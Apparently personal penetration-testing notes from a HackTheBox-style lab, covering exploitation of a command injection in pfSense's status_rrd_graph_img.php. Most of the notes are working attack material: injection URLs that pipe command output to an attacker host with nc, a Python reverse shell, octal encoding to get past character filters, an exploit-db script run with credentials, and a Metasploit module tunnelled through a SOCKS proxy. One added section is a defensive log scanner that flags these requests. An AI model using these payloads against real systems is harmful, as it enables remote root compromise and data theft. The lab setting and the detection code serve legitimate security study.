# PFSense

## Exec Code Exploit

* **google**: pfsense cve
  * cvedetails.com
    * bright red ones for 'pfsense'
    * 'exec code' as indicator
  * Use: CVE-2014-4688 (only 6.5 score)
  * exploitdb: 43560 ..interesting
* **google**: pfsense 2.1.3 changelog
  * Found: Nov 11, 2014 New Features
* **google**: pfsense exploits ..find good blogpost
  * proteansec - pt4: directory traversal
  * proteansec - pt2: command injection
  * **`status_rrd_graph_img.php`** ..still unpatched, we will use
* REF: [ReverseShell](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php#python), [LFI](https://pentest.mxhx.org/04-webapps/lfi), [CharEvasion](https://pentest.mxhx.org/03-getting-in/char-evasion-tricks)

## Mixed Results

* Had trouble following these examples from ippsec

```
pfsense > status > RRD Graphs

Cleanup the link:
https://$IP/status_rrd_graph_img.php?database=system-processor.rrd
https://$IP/status_rrd_graph_img.php?database=queues               ..from exploit/blog
https://$IP/status_rrd_graph_img.php?database=queues;sleep+10      ..worked!
https://$IP/status_rrd_graph_img.php?database=queues;echo+ippsec   ..ugly results
https://$IP/status_rrd_graph_img.php?database=queues;echo+ippsec|nc+10.10.14.6+9000
.. queues;echo+whoami|nc+10.10.14.6+9000    .. root
.. queues;echo+hostname|nc+10.10.14.6+9000  .. pfSense
nc -nvlp 9001

------------------------------
More:
.. queues;echo+abc|nc+10.10.14.6+9000    ..works
.. queues;find+/|nc+10.10.14.6+9000      ..fail ...find data in slash
.. queues;find+.|nc+10.10.14.6+9000      ..ok
nc -lvnp 9001 > filesystem.txt           ..catch

.. queues;echo+abc|nc+10.10.14.6+9000    ..ok
.. queues;echo+abc/|nc+10.10.14.6+9000   ..fails (slash blocked)
.. queues;env|nc+10.10.14.6+9000    ..get environment HOME=/

.. queues;echo+$(HOME)|nc+10.10.14.6+9000    ..get environment HOME=/
.. queues;FIND+$(HOME)|nc+10.10.14.6+9000    ..FIND /  ..NOW WORKS
.. queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt|nc+10.10.14.6+9001

nc -lvnp 9001 > filesystem.txt      
grep root.txt filesystem.txt

------------------------------
reverse
Python Reverse Shell

vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!
```

## gobuster - 45 minutes

```
> gobuster dir -w medium.txt -u https://10.x.x.x -k -x php,txt,conf,bak
/system-users.txt  ..found username!!!
```

## More Injections

```
https://10.x.x.x/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;id%3Ecmd.txt
https://10.x.x.x/cmd.txt  ..view results

https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20
```

## Octal Code to Injection

* If Dashes and Slashes are Blocked
* Use Octal Encoding

```
#!/usr/bin/env python3
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
    payload += ("\\" + oct(ord(char)).lstrip("0o"))
print(payload)
```

```
---------------------
Result:
\160\171\164\150\...

Verify:
printf '\160\171\164\150\...'
python -c 'import socket... worked!

---------------------
Octal Injection!
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh
```
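Detection-side view of the injections and the octal trick above, as an added example (not part of these notes, nor pfSense code): it scans constructed access-log lines for `status_rrd_graph_img.php` requests whose `database`/`graph` parameter carries shell metacharacters, and expands `\NNN` escapes so content hidden from a naive dash/slash filter becomes visible. The parameter list, log lines, addresses and timestamps are assumptions made for the example.

```python
"""Added detection example (not from the original notes): flag status_rrd_graph_img.php
requests whose database/graph parameter carries shell metacharacters, even behind \\NNN octal."""
import re
from urllib.parse import unquote_plus

SCRIPT = "status_rrd_graph_img.php"
WATCHED = ("database", "graph")              # parameters the injection notes abuse (assumed list)
SHELL_META = re.compile(r"[;|&`$]")          # command separators / substitution
OCTAL = re.compile(r"\\([0-7]{1,3})")        # printf-style octal escapes
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/', re.M)

def decode_octal(s: str) -> str:
    """Expand \\NNN escapes so characters a naive filter never saw become visible."""
    return OCTAL.sub(lambda m: chr(int(m.group(1), 8)), s)

def analyse_request(target: str) -> list:
    """Return the reasons a request target (path?query) looks like graph injection."""
    path, _, query = target.partition("?")
    if path.rsplit("/", 1)[-1] != SCRIPT or not query:
        return []
    reasons = []
    # Split by hand: parse_qs on older Pythons also splits on ';', the separator we must see.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name not in WATCHED:
            continue
        value = unquote_plus(raw)
        if SHELL_META.search(value):
            reasons.append(f"{name}: shell metacharacter in {value!r}")
        decoded = decode_octal(value)
        if decoded != value:
            reasons.append(f"{name}: octal escapes decode to {decoded!r}")
    return reasons

def scan_log(text: str) -> list:
    """Return (client, target, reasons) for each suspicious CLF-style line."""
    hits = []
    for m in REQUEST.finditer(text):
        reasons = analyse_request(m.group(2))
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits

# Constructed sample access log: a benign graph request, two injection shapes from the notes, one unrelated hit.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /status_rrd_graph_img.php?database=system-processor.rrd&graph=8hour HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:07 +0000] "GET /status_rrd_graph_img.php?database=queues;sleep+10 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2020:10:00:09 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150%27|sh HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2020:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 900
'''
```

Run `scan_log(SAMPLE_LOG)` to get the two flagged requests from 10.0.0.9; the second one reports both the raw `;`/`|` and the decoded octal text.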

## Easy Exploit

* <https://medium.com/@barpoet/hackthebox-sense-walkthrough-650865ed538c>
* <https://www.exploit-db.com/exploits/43560>

```
searchsploit -m php/webapps/43560.py
exploit-db 43560 > python command injection script
python3 43560.py --rhost 10.x.x.x --lhost 10.x.x.x --lport 4444 --username rohit --password pfsense
nc -nvlp 4444
whoami ..root
```

## Metasploit

* Plus Socks pivot from another box (since we were banned)

```
service postgresql start 
msfconsole
search pfsense 
graph injection
locate pfsense_graph

use exploit/unix/http/pfsense_graph_injection_exec
set RHOST $IP
set USERNAME rohit
set PASSWORD pfsense
set LHOST tun0
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true
exploit
m> shell
m> hostname
```

## Advanced

* [BruteCSRFPython](https://pentest.mxhx.org/05-passwords-ciphers/hydra#brute-csrf-python)
